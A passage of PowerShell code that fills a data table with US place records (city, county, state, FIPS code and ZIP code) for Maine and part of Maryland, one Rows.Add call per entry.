= $Cities.Rows.Add("North monmouth","Kennebec","Maine","ME","23","04265") + $null = $Cities.Rows.Add("Norway","Oxford","Maine","ME","23","04268") + $null = $Cities.Rows.Add("Oxford","Oxford","Maine","ME","23","04270") + $null = $Cities.Rows.Add("Poland spring","Androscoggin","Maine","ME","23","04274") + $null = $Cities.Rows.Add("Roxbury","Oxford","Maine","ME","23","04275") + $null = $Cities.Rows.Add("Rumford","Oxford","Maine","ME","23","04276") + $null = $Cities.Rows.Add("Sabattus","Androscoggin","Maine","ME","23","04280") + $null = $Cities.Rows.Add("South paris","Oxford","Maine","ME","23","04281") + $null = $Cities.Rows.Add("Turner","Androscoggin","Maine","ME","23","04282") + $null = $Cities.Rows.Add("Wayne","Kennebec","Maine","ME","23","04284") + $null = $Cities.Rows.Add("Weld","Franklin","Maine","ME","23","04285") + $null = $Cities.Rows.Add("West bowdoin","Sagadahoc","Maine","ME","23","04287") + $null = $Cities.Rows.Add("West paris","Oxford","Maine","ME","23","04289") + $null = $Cities.Rows.Add("Peru","Oxford","Maine","ME","23","04290") + $null = $Cities.Rows.Add("West sumner","Oxford","Maine","ME","23","04292") + $null = $Cities.Rows.Add("Wilton","Franklin","Maine","ME","23","04294") + $null = $Cities.Rows.Add("Zcta 042hh","Androscoggin","Maine","ME","23","042HH") + $null = $Cities.Rows.Add("Zcta 042xx","Oxford","Maine","ME","23","042XX") + $null = $Cities.Rows.Add("Augusta","Kennebec","Maine","ME","23","04330") + $null = $Cities.Rows.Add("Dresden","Lincoln","Maine","ME","23","04342") + $null = $Cities.Rows.Add("Farmingdale","Kennebec","Maine","ME","23","04344") + $null = $Cities.Rows.Add("Gardiner","Kennebec","Maine","ME","23","04345") + $null = $Cities.Rows.Add("Randolph","Kennebec","Maine","ME","23","04346") + $null = $Cities.Rows.Add("Hallowell","Kennebec","Maine","ME","23","04347") + $null = $Cities.Rows.Add("Jefferson","Lincoln","Maine","ME","23","04348") + $null = $Cities.Rows.Add("Kents hill","Kennebec","Maine","ME","23","04349") + $null = $Cities.Rows.Add("Litchfield","Kennebec","Maine","ME","23","04350") + $null = $Cities.Rows.Add("Manchester","Kennebec","Maine","ME","23","04351") + $null = $Cities.Rows.Add("Mount vernon","Kennebec","Maine","ME","23","04352") + $null = $Cities.Rows.Add("North whitefield","Lincoln","Maine","ME","23","04353") + $null = $Cities.Rows.Add("Palermo","Waldo","Maine","ME","23","04354") + $null = $Cities.Rows.Add("Readfield","Kennebec","Maine","ME","23","04355") + $null = $Cities.Rows.Add("Richmond","Sagadahoc","Maine","ME","23","04357") + $null = $Cities.Rows.Add("South china","Kennebec","Maine","ME","23","04358") + $null = $Cities.Rows.Add("Vienna","Kennebec","Maine","ME","23","04360") + $null = $Cities.Rows.Add("Windsor","Kennebec","Maine","ME","23","04363") + $null = $Cities.Rows.Add("Winthrop","Kennebec","Maine","ME","23","04364") + $null = $Cities.Rows.Add("Zcta 043hh","Kennebec","Maine","ME","23","043HH") + $null = $Cities.Rows.Add("Bangor","Penobscot","Maine","ME","23","04401") + $null = $Cities.Rows.Add("Abbot village","Piscataquis","Maine","ME","23","04406") + $null = $Cities.Rows.Add("Aurora","Hancock","Maine","ME","23","04408") + $null = $Cities.Rows.Add("Bradford","Penobscot","Maine","ME","23","04410") + $null = $Cities.Rows.Add("Bradley","Penobscot","Maine","ME","23","04411") + $null = $Cities.Rows.Add("Brewer","Penobscot","Maine","ME","23","04412") + $null = $Cities.Rows.Add("Brookton","Washington","Maine","ME","23","04413") + $null = $Cities.Rows.Add("Brownville","Piscataquis","Maine","ME","23","04414") + $null = $Cities.Rows.Add("Bucksport","Hancock","Maine","ME","23","04416") + $null = $Cities.Rows.Add("Burlington","Penobscot","Maine","ME","23","04417") + $null = $Cities.Rows.Add("Cardville","Penobscot","Maine","ME","23","04418") + $null = $Cities.Rows.Add("Carmel","Penobscot","Maine","ME","23","04419") + $null = $Cities.Rows.Add("Castine","Hancock","Maine","ME","23","04421") + $null = $Cities.Rows.Add("Charleston","Penobscot","Maine","ME","23","04422") + $null = $Cities.Rows.Add("Costigan","Penobscot","Maine","ME","23","04423") + $null = $Cities.Rows.Add("Danforth","Washington","Maine","ME","23","04424") + $null = $Cities.Rows.Add("Dover foxcroft","Piscataquis","Maine","ME","23","04426") + $null = $Cities.Rows.Add("East corinth","Penobscot","Maine","ME","23","04427") + $null = $Cities.Rows.Add("East eddington","Penobscot","Maine","ME","23","04428") + $null = $Cities.Rows.Add("East holden","Penobscot","Maine","ME","23","04429") + $null = $Cities.Rows.Add("East millinocket","Penobscot","Maine","ME","23","04430") + $null = $Cities.Rows.Add("East orland","Hancock","Maine","ME","23","04431") + $null = $Cities.Rows.Add("Etna","Penobscot","Maine","ME","23","04434") + $null = $Cities.Rows.Add("Exeter","Penobscot","Maine","ME","23","04435") + $null = $Cities.Rows.Add("Frankfort","Waldo","Maine","ME","23","04438") + $null = $Cities.Rows.Add("Greenville","Piscataquis","Maine","ME","23","04441") + $null = $Cities.Rows.Add("Greenville junct","Piscataquis","Maine","ME","23","04442") + $null = $Cities.Rows.Add("Guilford","Piscataquis","Maine","ME","23","04443") + $null = $Cities.Rows.Add("Hampden","Penobscot","Maine","ME","23","04444") + $null = $Cities.Rows.Add("Seboeis","Penobscot","Maine","ME","23","04448") + $null = $Cities.Rows.Add("Hudson","Penobscot","Maine","ME","23","04449") + $null = $Cities.Rows.Add("Kenduskeag","Penobscot","Maine","ME","23","04450") + $null = $Cities.Rows.Add("Kingman","Penobscot","Maine","ME","23","04451") + $null = $Cities.Rows.Add("Lagrange","Penobscot","Maine","ME","23","04453") + $null = $Cities.Rows.Add("Lee","Penobscot","Maine","ME","23","04455") + $null = $Cities.Rows.Add("Levant","Penobscot","Maine","ME","23","04456") + $null = $Cities.Rows.Add("Lincoln","Penobscot","Maine","ME","23","04457") + $null = $Cities.Rows.Add("Mattawamkeag","Penobscot","Maine","ME","23","04459") + $null = $Cities.Rows.Add("Medway","Penobscot","Maine","ME","23","04460") + $null = $Cities.Rows.Add("Milford","Penobscot","Maine","ME","23","04461") + $null = $Cities.Rows.Add("Millinocket","Penobscot","Maine","ME","23","04462") + $null = $Cities.Rows.Add("Derby","Piscataquis","Maine","ME","23","04463") + $null = $Cities.Rows.Add("Monson","Piscataquis","Maine","ME","23","04464") + $null = $Cities.Rows.Add("Old town","Penobscot","Maine","ME","23","04468") + $null = $Cities.Rows.Add("North amity","Aroostook","Maine","ME","23","04471") + $null = $Cities.Rows.Add("Orland","Hancock","Maine","ME","23","04472") + $null = $Cities.Rows.Add("Orono","Penobscot","Maine","ME","23","04473") + $null = $Cities.Rows.Add("Orrington","Penobscot","Maine","ME","23","04474") + $null = $Cities.Rows.Add("Passadumkeag","Penobscot","Maine","ME","23","04475") + $null = $Cities.Rows.Add("Penobscot","Hancock","Maine","ME","23","04476") + $null = $Cities.Rows.Add("Rockwood","Somerset","Maine","ME","23","04478") + $null = $Cities.Rows.Add("Sangerville","Piscataquis","Maine","ME","23","04479") + $null = $Cities.Rows.Add("Springfield","Penobscot","Maine","ME","23","04487") + $null = $Cities.Rows.Add("Stetson","Penobscot","Maine","ME","23","04488") + $null = $Cities.Rows.Add("Topsfield","Washington","Maine","ME","23","04490") + $null = $Cities.Rows.Add("West enfield","Penobscot","Maine","ME","23","04493") + $null = $Cities.Rows.Add("Winn","Penobscot","Maine","ME","23","04495") + $null = $Cities.Rows.Add("Winterport","Waldo","Maine","ME","23","04496") + $null = $Cities.Rows.Add("Wytopitlock","Aroostook","Maine","ME","23","04497") + $null = $Cities.Rows.Add("Zcta 044hh","Aroostook","Maine","ME","23","044HH") + $null = $Cities.Rows.Add("Zcta 044xx","Piscataquis","Maine","ME","23","044XX") + $null = $Cities.Rows.Add("Bath","Sagadahoc","Maine","ME","23","04530") + $null = $Cities.Rows.Add("Alna","Lincoln","Maine","ME","23","04535") + $null = $Cities.Rows.Add("Boothbay","Lincoln","Maine","ME","23","04537") + $null = $Cities.Rows.Add("Capitol island","Lincoln","Maine","ME","23","04538") + $null = $Cities.Rows.Add("Bristol","Lincoln","Maine","ME","23","04539") + $null = $Cities.Rows.Add("Chamberlain","Lincoln","Maine","ME","23","04541") + $null = $Cities.Rows.Add("Damariscotta","Lincoln","Maine","ME","23","04543") + $null = $Cities.Rows.Add("East boothbay","Lincoln","Maine","ME","23","04544") + $null = $Cities.Rows.Add("Friendship","Knox","Maine","ME","23","04547") + $null = $Cities.Rows.Add("Mac mahan","Sagadahoc","Maine","ME","23","04548") + $null = $Cities.Rows.Add("Medomak","Lincoln","Maine","ME","23","04551") + $null = $Cities.Rows.Add("Newcastle","Lincoln","Maine","ME","23","04553") + $null = $Cities.Rows.Add("New harbor","Lincoln","Maine","ME","23","04554") + $null = $Cities.Rows.Add("Nobleboro","Lincoln","Maine","ME","23","04555") + $null = $Cities.Rows.Add("Edgecomb","Lincoln","Maine","ME","23","04556") + $null = $Cities.Rows.Add("Pemaquid","Lincoln","Maine","ME","23","04558") + $null = $Cities.Rows.Add("Phippsburg","Sagadahoc","Maine","ME","23","04562") + $null = $Cities.Rows.Add("Cushing","Knox","Maine","ME","23","04563") + $null = $Cities.Rows.Add("Round pond","Lincoln","Maine","ME","23","04564") + $null = $Cities.Rows.Add("South bristol","Lincoln","Maine","ME","23","04568") + $null = $Cities.Rows.Add("Waldoboro","Lincoln","Maine","ME","23","04572") + $null = $Cities.Rows.Add("Walpole","Lincoln","Maine","ME","23","04573") + $null = $Cities.Rows.Add("Washington","Knox","Maine","ME","23","04574") + $null = $Cities.Rows.Add("West southport","Lincoln","Maine","ME","23","04576") + $null = $Cities.Rows.Add("Wiscasset","Lincoln","Maine","ME","23","04578") + $null = $Cities.Rows.Add("Woolwich","Sagadahoc","Maine","ME","23","04579") + $null = $Cities.Rows.Add("Zcta 045hh","Knox","Maine","ME","23","045HH") + $null = $Cities.Rows.Add("Ellsworth","Hancock","Maine","ME","23","04605") + $null = $Cities.Rows.Add("Addison","Washington","Maine","ME","23","04606") + $null = $Cities.Rows.Add("Gouldsboro","Hancock","Maine","ME","23","04607") + $null = $Cities.Rows.Add("Bar harbor","Hancock","Maine","ME","23","04609") + $null = $Cities.Rows.Add("Beals","Washington","Maine","ME","23","04611") + $null = $Cities.Rows.Add("Bernard","Hancock","Maine","ME","23","04612") + $null = $Cities.Rows.Add("Birch harbor","Hancock","Maine","ME","23","04613") + $null = $Cities.Rows.Add("Blue hill","Hancock","Maine","ME","23","04614") + $null = $Cities.Rows.Add("Blue hill falls","Hancock","Maine","ME","23","04615") + $null = $Cities.Rows.Add("Brooklin","Hancock","Maine","ME","23","04616") + $null = $Cities.Rows.Add("Brooksville","Hancock","Maine","ME","23","04617") + $null = $Cities.Rows.Add("Calais","Washington","Maine","ME","23","04619") + $null = $Cities.Rows.Add("Cherryfield","Washington","Maine","ME","23","04622") + $null = $Cities.Rows.Add("Columbia falls","Washington","Maine","ME","23","04623") + $null = $Cities.Rows.Add("Corea","Hancock","Maine","ME","23","04624") + $null = $Cities.Rows.Add("Cranberry isles","Hancock","Maine","ME","23","04625") + $null = $Cities.Rows.Add("Cutler","Washington","Maine","ME","23","04626") + $null = $Cities.Rows.Add("Deer isle","Hancock","Maine","ME","23","04627") + $null = $Cities.Rows.Add("Dennysville","Washington","Maine","ME","23","04628") + $null = $Cities.Rows.Add("East blue hill","Hancock","Maine","ME","23","04629") + $null = $Cities.Rows.Add("East machias","Washington","Maine","ME","23","04630") + $null = $Cities.Rows.Add("Eastport","Washington","Maine","ME","23","04631") + $null = $Cities.Rows.Add("Franklin","Hancock","Maine","ME","23","04634") + $null = $Cities.Rows.Add("Frenchboro","Hancock","Maine","ME","23","04635") + $null = $Cities.Rows.Add("Hancock","Hancock","Maine","ME","23","04640") + $null = $Cities.Rows.Add("Harborside","Hancock","Maine","ME","23","04642") + $null = $Cities.Rows.Add("Harrington","Washington","Maine","ME","23","04643") + $null = $Cities.Rows.Add("Isle au haut","Knox","Maine","ME","23","04645") + $null = $Cities.Rows.Add("Islesford","Hancock","Maine","ME","23","04646") + $null = $Cities.Rows.Add("Jonesboro","Washington","Maine","ME","23","04648") + $null = $Cities.Rows.Add("Jonesport","Washington","Maine","ME","23","04649") + $null = $Cities.Rows.Add("Little deer isle","Hancock","Maine","ME","23","04650") + $null = $Cities.Rows.Add("Lubec","Washington","Maine","ME","23","04652") + $null = $Cities.Rows.Add("Bass harbor","Hancock","Maine","ME","23","04653") + $null = $Cities.Rows.Add("Machias","Washington","Maine","ME","23","04654") + $null = $Cities.Rows.Add("Machiasport","Washington","Maine","ME","23","04655") + $null = $Cities.Rows.Add("Meddybemps","Washington","Maine","ME","23","04657") + $null = $Cities.Rows.Add("Milbridge","Washington","Maine","ME","23","04658") + $null = $Cities.Rows.Add("Mount desert","Hancock","Maine","ME","23","04660") + $null = $Cities.Rows.Add("Northeast harbor","Hancock","Maine","ME","23","04662") + $null = $Cities.Rows.Add("North sullivan","Hancock","Maine","ME","23","04664") + $null = $Cities.Rows.Add("Pembroke","Washington","Maine","ME","23","04666") + $null = $Cities.Rows.Add("Perry","Washington","Maine","ME","23","04667") + $null = $Cities.Rows.Add("Princeton","Washington","Maine","ME","23","04668") + $null = $Cities.Rows.Add("Prospect harbor","Hancock","Maine","ME","23","04669") + $null = $Cities.Rows.Add("Robbinston","Washington","Maine","ME","23","04671") + $null = $Cities.Rows.Add("Salsbury cove","Hancock","Maine","ME","23","04672") + $null = $Cities.Rows.Add("Sargentville","Hancock","Maine","ME","23","04673") + $null = $Cities.Rows.Add("Seal cove","Hancock","Maine","ME","23","04674") + $null = $Cities.Rows.Add("Seal harbor","Hancock","Maine","ME","23","04675") + $null = $Cities.Rows.Add("Sedgwick","Hancock","Maine","ME","23","04676") + $null = $Cities.Rows.Add("Sorrento","Hancock","Maine","ME","23","04677") + $null = $Cities.Rows.Add("Southwest harbor","Hancock","Maine","ME","23","04679") + $null = $Cities.Rows.Add("Steuben","Washington","Maine","ME","23","04680") + $null = $Cities.Rows.Add("Stonington","Hancock","Maine","ME","23","04681") + $null = $Cities.Rows.Add("Sunset","Hancock","Maine","ME","23","04683") + $null = $Cities.Rows.Add("Surry","Hancock","Maine","ME","23","04684") + $null = $Cities.Rows.Add("Swans island","Hancock","Maine","ME","23","04685") + $null = $Cities.Rows.Add("Whiting","Washington","Maine","ME","23","04691") + $null = $Cities.Rows.Add("Winter harbor","Hancock","Maine","ME","23","04693") + $null = $Cities.Rows.Add("Woodland","Washington","Maine","ME","23","04694") + $null = $Cities.Rows.Add("Zcta 046hh","Hancock","Maine","ME","23","046HH") + $null = $Cities.Rows.Add("Zcta 046xx","Washington","Maine","ME","23","046XX") + $null = $Cities.Rows.Add("Houlton","Aroostook","Maine","ME","23","04730") + $null = $Cities.Rows.Add("Ashland","Aroostook","Maine","ME","23","04732") + $null = $Cities.Rows.Add("Benedicta","Aroostook","Maine","ME","23","04733") + $null = $Cities.Rows.Add("Bridgewater","Aroostook","Maine","ME","23","04735") + $null = $Cities.Rows.Add("Caribou","Aroostook","Maine","ME","23","04736") + $null = $Cities.Rows.Add("Eagle lake","Aroostook","Maine","ME","23","04739") + $null = $Cities.Rows.Add("Easton","Aroostook","Maine","ME","23","04740") + $null = $Cities.Rows.Add("Fort fairfield","Aroostook","Maine","ME","23","04742") + $null = $Cities.Rows.Add("Fort kent","Aroostook","Maine","ME","23","04743") + $null = $Cities.Rows.Add("Frenchville","Aroostook","Maine","ME","23","04745") + $null = $Cities.Rows.Add("Grand isle","Aroostook","Maine","ME","23","04746") + $null = $Cities.Rows.Add("Island falls","Aroostook","Maine","ME","23","04747") + $null = $Cities.Rows.Add("Limestone","Aroostook","Maine","ME","23","04750") + $null = $Cities.Rows.Add("Madawaska","Aroostook","Maine","ME","23","04756") + $null = $Cities.Rows.Add("Mapleton","Aroostook","Maine","ME","23","04757") + $null = $Cities.Rows.Add("Mars hill","Aroostook","Maine","ME","23","04758") + $null = $Cities.Rows.Add("Masardis","Aroostook","Maine","ME","23","04759") + $null = $Cities.Rows.Add("Monticello","Aroostook","Maine","ME","23","04760") + $null = $Cities.Rows.Add("New sweden","Aroostook","Maine","ME","23","04762") + $null = $Cities.Rows.Add("Oakfield","Aroostook","Maine","ME","23","04763") + $null = $Cities.Rows.Add("Oxbow","Aroostook","Maine","ME","23","04764") + $null = $Cities.Rows.Add("Patten","Penobscot","Maine","ME","23","04765") + $null = $Cities.Rows.Add("Perham","Aroostook","Maine","ME","23","04766") + $null = $Cities.Rows.Add("Portage","Aroostook","Maine","ME","23","04768") + $null = $Cities.Rows.Add("Presque isle","Aroostook","Maine","ME","23","04769") + $null = $Cities.Rows.Add("Saint agatha","Aroostook","Maine","ME","23","04772") + $null = $Cities.Rows.Add("Saint david","Aroostook","Maine","ME","23","04773") + $null = $Cities.Rows.Add("Saint francis","Aroostook","Maine","ME","23","04774") + $null = $Cities.Rows.Add("Sherman mills","Aroostook","Maine","ME","23","04776") + $null = $Cities.Rows.Add("Sherman station","Penobscot","Maine","ME","23","04777") + $null = $Cities.Rows.Add("Sinclair","Aroostook","Maine","ME","23","04779") + $null = $Cities.Rows.Add("Smyrna mills","Aroostook","Maine","ME","23","04780") + $null = $Cities.Rows.Add("Soldier pond","Aroostook","Maine","ME","23","04781") + $null = $Cities.Rows.Add("Stockholm","Aroostook","Maine","ME","23","04783") + $null = $Cities.Rows.Add("Van buren","Aroostook","Maine","ME","23","04785") + $null = $Cities.Rows.Add("Washburn","Aroostook","Maine","ME","23","04786") + $null = $Cities.Rows.Add("Westfield","Aroostook","Maine","ME","23","04787") + $null = $Cities.Rows.Add("Zcta 047hh","Aroostook","Maine","ME","23","047HH") + $null = $Cities.Rows.Add("Zcta 047xx","Aroostook","Maine","ME","23","047XX") + $null = $Cities.Rows.Add("Rockland","Knox","Maine","ME","23","04841") + $null = $Cities.Rows.Add("Camden","Knox","Maine","ME","23","04843") + $null = $Cities.Rows.Add("Hope","Knox","Maine","ME","23","04847") + $null = $Cities.Rows.Add("Islesboro","Waldo","Maine","ME","23","04848") + $null = $Cities.Rows.Add("Lincolnville","Waldo","Maine","ME","23","04849") + $null = $Cities.Rows.Add("Matinicus","Knox","Maine","ME","23","04851") + $null = $Cities.Rows.Add("Monhegan","Lincoln","Maine","ME","23","04852") + $null = $Cities.Rows.Add("North haven","Knox","Maine","ME","23","04853") + $null = $Cities.Rows.Add("Owls head","Knox","Maine","ME","23","04854") + $null = $Cities.Rows.Add("Rockport","Knox","Maine","ME","23","04856") + $null = $Cities.Rows.Add("Saint george","Knox","Maine","ME","23","04857") + $null = $Cities.Rows.Add("South thomaston","Knox","Maine","ME","23","04858") + $null = $Cities.Rows.Add("Spruce head","Knox","Maine","ME","23","04859") + $null = $Cities.Rows.Add("Tenants harbor","Knox","Maine","ME","23","04860") + $null = $Cities.Rows.Add("Thomaston","Knox","Maine","ME","23","04861") + $null = $Cities.Rows.Add("Union","Knox","Maine","ME","23","04862") + $null = $Cities.Rows.Add("Vinalhaven","Knox","Maine","ME","23","04863") + $null = $Cities.Rows.Add("Warren","Knox","Maine","ME","23","04864") + $null = $Cities.Rows.Add("Zcta 048hh","Knox","Maine","ME","23","048HH") + $null = $Cities.Rows.Add("Winslow","Kennebec","Maine","ME","23","04901") + $null = $Cities.Rows.Add("Albion","Kennebec","Maine","ME","23","04910") + $null = $Cities.Rows.Add("Anson","Somerset","Maine","ME","23","04911") + $null = $Cities.Rows.Add("Athens","Somerset","Maine","ME","23","04912") + $null = $Cities.Rows.Add("Belfast","Waldo","Maine","ME","23","04915") + $null = $Cities.Rows.Add("Belgrade","Kennebec","Maine","ME","23","04917") + $null = $Cities.Rows.Add("Bingham","Somerset","Maine","ME","23","04920") + $null = $Cities.Rows.Add("Brooks","Waldo","Maine","ME","23","04921") + $null = $Cities.Rows.Add("Burnham","Waldo","Maine","ME","23","04922") + $null = $Cities.Rows.Add("Cambridge","Somerset","Maine","ME","23","04923") + $null = $Cities.Rows.Add("Canaan","Somerset","Maine","ME","23","04924") + $null = $Cities.Rows.Add("Caratunk","Somerset","Maine","ME","23","04925") + $null = $Cities.Rows.Add("Clinton","Kennebec","Maine","ME","23","04927") + $null = $Cities.Rows.Add("Corinna","Penobscot","Maine","ME","23","04928") + $null = $Cities.Rows.Add("Detroit","Somerset","Maine","ME","23","04929") + $null = $Cities.Rows.Add("Dexter","Penobscot","Maine","ME","23","04930") + $null = $Cities.Rows.Add("Dixmont","Penobscot","Maine","ME","23","04932") + $null = $Cities.Rows.Add("Eustis","Franklin","Maine","ME","23","04936") + $null = $Cities.Rows.Add("Benton station","Somerset","Maine","ME","23","04937") + $null = $Cities.Rows.Add("Farmington","Franklin","Maine","ME","23","04938") + $null = $Cities.Rows.Add("Garland","Penobscot","Maine","ME","23","04939") + $null = $Cities.Rows.Add("Freedom","Waldo","Maine","ME","23","04941") + $null = $Cities.Rows.Add("Wellington","Somerset","Maine","ME","23","04942") + $null = $Cities.Rows.Add("Hartland","Somerset","Maine","ME","23","04943") + $null = $Cities.Rows.Add("Jackman","Somerset","Maine","ME","23","04945") + $null = $Cities.Rows.Add("Kingfield","Franklin","Maine","ME","23","04947") + $null = $Cities.Rows.Add("Liberty","Waldo","Maine","ME","23","04949") + $null = $Cities.Rows.Add("Madison","Somerset","Maine","ME","23","04950") + $null = $Cities.Rows.Add("Monroe","Waldo","Maine","ME","23","04951") + $null = $Cities.Rows.Add("Morrill","Waldo","Maine","ME","23","04952") + $null = $Cities.Rows.Add("Newport","Penobscot","Maine","ME","23","04953") + $null = $Cities.Rows.Add("New portland","Somerset","Maine","ME","23","04954") + $null = $Cities.Rows.Add("New sharon","Franklin","Maine","ME","23","04955") + $null = $Cities.Rows.Add("New vineyard","Franklin","Maine","ME","23","04956") + $null = $Cities.Rows.Add("Norridgewock","Somerset","Maine","ME","23","04957") + $null = $Cities.Rows.Add("North anson","Somerset","Maine","ME","23","04958") + $null = $Cities.Rows.Add("North new portla","Somerset","Maine","ME","23","04961") + $null = $Cities.Rows.Add("North vassalboro","Kennebec","Maine","ME","23","04962") + $null = $Cities.Rows.Add("Oakland","Kennebec","Maine","ME","23","04963") + $null = $Cities.Rows.Add("Oquossoc","Franklin","Maine","ME","23","04964") + $null = $Cities.Rows.Add("Palmyra","Somerset","Maine","ME","23","04965") + $null = $Cities.Rows.Add("Phillips","Franklin","Maine","ME","23","04966") + $null = $Cities.Rows.Add("Pittsfield","Somerset","Maine","ME","23","04967") + $null = $Cities.Rows.Add("Plymouth","Penobscot","Maine","ME","23","04969") + $null = $Cities.Rows.Add("Rangeley","Franklin","Maine","ME","23","04970") + $null = $Cities.Rows.Add("Saint albans","Somerset","Maine","ME","23","04971") + $null = $Cities.Rows.Add("Searsmont","Waldo","Maine","ME","23","04973") + $null = $Cities.Rows.Add("Searsport","Waldo","Maine","ME","23","04974") + $null = $Cities.Rows.Add("Skowhegan","Somerset","Maine","ME","23","04976") + $null = $Cities.Rows.Add("Smithfield","Somerset","Maine","ME","23","04978") + $null = $Cities.Rows.Add("Solon","Somerset","Maine","ME","23","04979") + $null = $Cities.Rows.Add("Stockton springs","Waldo","Maine","ME","23","04981") + $null = $Cities.Rows.Add("Stratton","Franklin","Maine","ME","23","04982") + $null = $Cities.Rows.Add("Strong","Franklin","Maine","ME","23","04983") + $null = $Cities.Rows.Add("Temple","Franklin","Maine","ME","23","04984") + $null = $Cities.Rows.Add("West forks","Somerset","Maine","ME","23","04985") + $null = $Cities.Rows.Add("Thorndike","Waldo","Maine","ME","23","04986") + $null = $Cities.Rows.Add("Troy","Waldo","Maine","ME","23","04987") + $null = $Cities.Rows.Add("Unity","Waldo","Maine","ME","23","04988") + $null = $Cities.Rows.Add("Vassalboro","Kennebec","Maine","ME","23","04989") + $null = $Cities.Rows.Add("Zcta 049hh","Franklin","Maine","ME","23","049HH") + $null = $Cities.Rows.Add("Zcta 049xx","Somerset","Maine","ME","23","049XX") + $null = $Cities.Rows.Add("Waldorf","Charles","Maryland","MD","24","20601") + $null = $Cities.Rows.Add("Saint charles","Charles","Maryland","MD","24","20602") + $null = $Cities.Rows.Add("Saint charles","Charles","Maryland","MD","24","20603") + $null = $Cities.Rows.Add("Abell","St. Marys","Maryland","MD","24","20606") + $null = $Cities.Rows.Add("Accokeek","Prince Georges","Maryland","MD","24","20607") + $null = $Cities.Rows.Add("Aquasco","Prince Georges","Maryland","MD","24","20608") + $null = $Cities.Rows.Add("Avenue","St. Marys","Maryland","MD","24","20609") + $null = $Cities.Rows.Add("Bel alton","Charles","Maryland","MD","24","20611") + $null = $Cities.Rows.Add("Benedict","Charles","Maryland","MD","24","20612") + $null = $Cities.Rows.Add("Brandywine","Prince Georges","Maryland","MD","24","20613") + $null = $Cities.Rows.Add("Broomes island","Calvert","Maryland","MD","24","20615") + $null = $Cities.Rows.Add("Bryans road","Charles","Maryland","MD","24","20616") + $null = $Cities.Rows.Add("Bryantown","Charles","Maryland","MD","24","20617") + $null = $Cities.Rows.Add("Bushwood","St. Marys","Maryland","MD","24","20618") + $null = $Cities.Rows.Add("California","St. Marys","Maryland","MD","24","20619") + $null = $Cities.Rows.Add("Callaway","St. Marys","Maryland","MD","24","20620") + $null = $Cities.Rows.Add("Maddox","St. Marys","Maryland","MD","24","20621") + $null = $Cities.Rows.Add("Charlotte hall","Charles","Maryland","MD","24","20622") + $null = $Cities.Rows.Add("Cheltenham","Prince Georges","Maryland","MD","24","20623") + $null = $Cities.Rows.Add("Clements","St. Marys","Maryland","MD","24","20624") + $null = $Cities.Rows.Add("Cobb island","Charles","Maryland","MD","24","20625") + $null = $Cities.Rows.Add("Coltons point","St. Marys","Maryland","MD","24","20626") + $null = $Cities.Rows.Add("Dameron","St. Marys","Maryland","MD","24","20628") + $null = $Cities.Rows.Add("Dowell","Calvert","Maryland","MD","24","20629") + $null = $Cities.Rows.Add("Drayden","St. Marys","Maryland","MD","24","20630") + $null = $Cities.Rows.Add("Faulkner","Charles","Maryland","MD","24","20632") + $null = $Cities.Rows.Add("Great mills","St. Marys","Maryland","MD","24","20634") + $null = $Cities.Rows.Add("Hollywood","St. Marys","Maryland","MD","24","20636") + $null = $Cities.Rows.Add("Hughesville","Charles","Maryland","MD","24","20637") + $null = $Cities.Rows.Add("Huntingtown","Calvert","Maryland","MD","24","20639") + $null = $Cities.Rows.Add("Pisgah","Charles","Maryland","MD","24","20640") + $null = $Cities.Rows.Add("Issue","Charles","Maryland","MD","24","20645") + $null = $Cities.Rows.Add("La plata","Charles","Maryland","MD","24","20646") + $null = $Cities.Rows.Add("Leonardtown","St. Marys","Maryland","MD","24","20650") + $null = $Cities.Rows.Add("Lexington park","St. Marys","Maryland","MD","24","20653") + $null = $Cities.Rows.Add("Lusby","Calvert","Maryland","MD","24","20657") + $null = $Cities.Rows.Add("Rison","Charles","Maryland","MD","24","20658") + $null = $Cities.Rows.Add("Mechanicsville","St. Marys","Maryland","MD","24","20659") + $null = $Cities.Rows.Add("Nanjemoy","Charles","Maryland","MD","24","20662") + $null = $Cities.Rows.Add("Newburg","Charles","Maryland","MD","24","20664") + $null = $Cities.Rows.Add("Park hall","St. Marys","Maryland","MD","24","20667") + $null = $Cities.Rows.Add("Patuxent river","St. Marys","Maryland","MD","24","20670") + $null = $Cities.Rows.Add("Piney point","St. Marys","Maryland","MD","24","20674") + $null = $Cities.Rows.Add("Pomfret","Charles","Maryland","MD","24","20675") + $null = $Cities.Rows.Add("Port republic","Calvert","Maryland","MD","24","20676") + $null = $Cities.Rows.Add("Port tobacco","Charles","Maryland","MD","24","20677") + $null = $Cities.Rows.Add("Prince frederick","Calvert","Maryland","MD","24","20678") + $null = $Cities.Rows.Add("Ridge","St. Marys","Maryland","MD","24","20680") + $null = $Cities.Rows.Add("Saint inigoes","St. Marys","Maryland","MD","24","20684") + $null = $Cities.Rows.Add("Saint leonard","Calvert","Maryland","MD","24","20685") + $null = $Cities.Rows.Add("Scotland","St. Marys","Maryland","MD","24","20687") + $null = $Cities.Rows.Add("Solomons","Calvert","Maryland","MD","24","20688") + $null = $Cities.Rows.Add("Sunderland","Calvert","Maryland","MD","24","20689") + $null = $Cities.Rows.Add("Tall timbers","St. Marys","Maryland","MD","24","20690") + $null = $Cities.Rows.Add("Valley lee","St. Marys","Maryland","MD","24","20692") + $null = $Cities.Rows.Add("Welcome","Charles","Maryland","MD","24","20693") + $null = $Cities.Rows.Add("White plains","Charles","Maryland","MD","24","20695") + $null = $Cities.Rows.Add("Zcta 206hh","Calvert","Maryland","MD","24","206HH") + $null = $Cities.Rows.Add("Annapolis juncti","Howard","Maryland","MD","24","20701") + $null = $Cities.Rows.Add("Beltsville","Prince Georges","Maryland","MD","24","20705") + $null = $Cities.Rows.Add("Lanham","Prince Georges","Maryland","MD","24","20706") + $null = $Cities.Rows.Add("Laurel","Prince Georges","Maryland","MD","24","20707") + $null = $Cities.Rows.Add("Montpelier","Prince Georges","Maryland","MD","24","20708") + $null = $Cities.Rows.Add("Bladensburg","Prince Georges","Maryland","MD","24","20710") + $null = $Cities.Rows.Add("Lothian","Anne Arundel","Maryland","MD","24","20711") + $null = $Cities.Rows.Add("Mount rainier","Prince Georges","Maryland","MD","24","20712") + $null = $Cities.Rows.Add("North beach","Calvert","Maryland","MD","24","20714") + $null = $Cities.Rows.Add("Bowie","Prince Georges","Maryland","MD","24","20715") + $null = $Cities.Rows.Add("Mitchellville","Prince Georges","Maryland","MD","24","20716") + $null = $Cities.Rows.Add("Bowie","Prince Georges","Maryland","MD","24","20720") + $null = $Cities.Rows.Add("Mitchellville","Prince Georges","Maryland","MD","24","20721") + $null = $Cities.Rows.Add("Brentwood","Prince Georges","Maryland","MD","24","20722") + $null = 